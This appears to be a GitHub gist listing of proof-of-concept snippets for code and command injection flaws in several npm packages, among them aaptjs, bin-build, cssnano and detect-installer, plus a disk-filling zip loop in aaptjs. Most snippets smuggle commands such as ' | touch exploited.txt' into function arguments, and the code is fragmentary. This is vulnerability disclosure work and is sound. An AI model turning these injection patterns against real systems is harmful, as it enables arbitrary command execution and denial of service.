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mcoimbra / 0x_poc.js
Last active October 29, 2023 12:21
Package 0x: Affected versions of this package are vulnerable to code injection. Calling zeroEks(args) will execute a local file (via lib/v8-log-to-ticks.js#74) which may run arbitrary commands. This requires the presence of additional files which can be empty.
const zeroEks = require('0x');
var args = {
pathToNodeBinary: "./",
visualizeOnly: "./",
v: true
* For this to work, the following files with specific names must be present
mcoimbra / aaptjs_poc.js
Last active October 26, 2023 12:09
Package aaptjs: The aaptjs module's 'add' function can add files to an existing .zip file. It is possible to call it once to create a .zip file and then iteratively create a new .zip from the previous one, eventually filling the file system storage space.
'use strict'
const pkg = require('aaptjs');
* Creates many zip files. After PREV_ZIP_SZ zip files created,
* it starts adding the last PREV_ZIP_SZ zip files to the new one
* rather than just hte previous one.
mcoimbra / aaptjs_poc-zip-cmd-inject.js
Last active October 29, 2023 12:18
Package aaptjs: The aaptjs module's 'add' function can be exploited through its first argument. It is a string through which a command can be injected by piping after the zip file value. Example: ' | touch exploited.txt'.
'use strict'
const pkg = require('aaptjs');
* Function 'aaptjs.add' starts a child process with a method signature
* that takes a single string command containing both the binary and arguments,
* thus being vulnerable to this pipe usage example.
* A local 'exploited.txt' file will be created.
mcoimbra / babel-plugin-module-rewrite-0.2.0_poc.js
Last active October 29, 2023 12:16
Package babel-plugin-module-rewrite: The babel-plugin-module-rewrite package enables command injection into the eval() function by appropriately setting the function parameters as shown in this example.
'use strict'
const pkg = require('babel-plugin-module-rewrite');
const _ref2 = {
types: {
isIdentifier: function() { return true; },
isMemberExpression: function() {}
mcoimbra / bin-build-3.0.0_poc.js
Last active October 29, 2023 12:15
Package bin-build: The src/index.js file in package bin-build allows for command injection via the arguments passed to (see line #8 of src/index.js).
'use strict'
const pkg = require('bin-build');
// A local 'exploited.txt' file will be created."./", ["touch exploited.txt"]);
* Relevant code from src/index.js
mcoimbra / circle-github-bot_poc.js
Last active November 29, 2023 19:01
Package circle-github-bot: The call to function curl (#28) in src/dist/index.js does not sanitize the parameters passed to exec(), enabling the injection of something like " | touch exploit.txt".
'use strict'
const pkg = require('circle-github-bot');
const i = new pkg();
i.env = {};
// This will create a local 'exploited.txt' file.
i.curl('', ' | touch exploited.txt', '');
mcoimbra / cssnano_poc.js
Last active November 9, 2023 16:18
Package cssnano: Allows a custom function to be passed into its internals (#56 in src/index.js) which will then execute it. In this example an 'exploited.txt' file is created.
'use strict'
const pkg = require('cssnano');
const options = {
preset: function() {
const fs = require('node:fs');
let fd = fs.openSync('exploited.txt', 'a');
mcoimbra / daemonize-process_poc.js
Last active October 29, 2023 12:22
Package daemonize-process: Kills the current process and launches a copy of its semantics as a background process. The process object attributes process.execPath and process.argv may be changed beforehand to launch an arbitrary script. This could be used for example to launch command 'yes' piped into a file, as an example.
'use strict'
const daemonizeProcess = require('daemonize-process');
process.execPath = 'touch';
process.argv = ['touch', 'exploited.txt', ''];
* This will launch a child process that is supposed to be the same binary of the current process.
* By hijacking process.execPath and process.argv, we inject a different executable.
mcoimbra / dockermachine-cli-js_poc.js
Last active October 29, 2023 12:09
Package dockermachine-cli-js: A DockerMachine instance can be created through a child process started by the package. Possible to inject a command (e.g. ' | touch exploit.txt') through the parameter of its command method.
'use strict'
const pkg = require('dockermachine-cli-js');
const d = new pkg.DockerMachine();
const commandStr = ' | touch exploited.txt';
// An 'exploited.txt' file will be created locally.
mcoimbra / detect-installer-1.0.2_poc.js
Last active October 29, 2023 12:23
Package detect-installer: Module detect-installer has the purpose of detecting an appropriate package manager to use but it enables command injection into child_process' execSync.
'use strict'
const pkg = require('detect-installer');
// This creates a local 'exploited.txt' file.
pkg.hasPackageCommand('touch exploited.txt | ');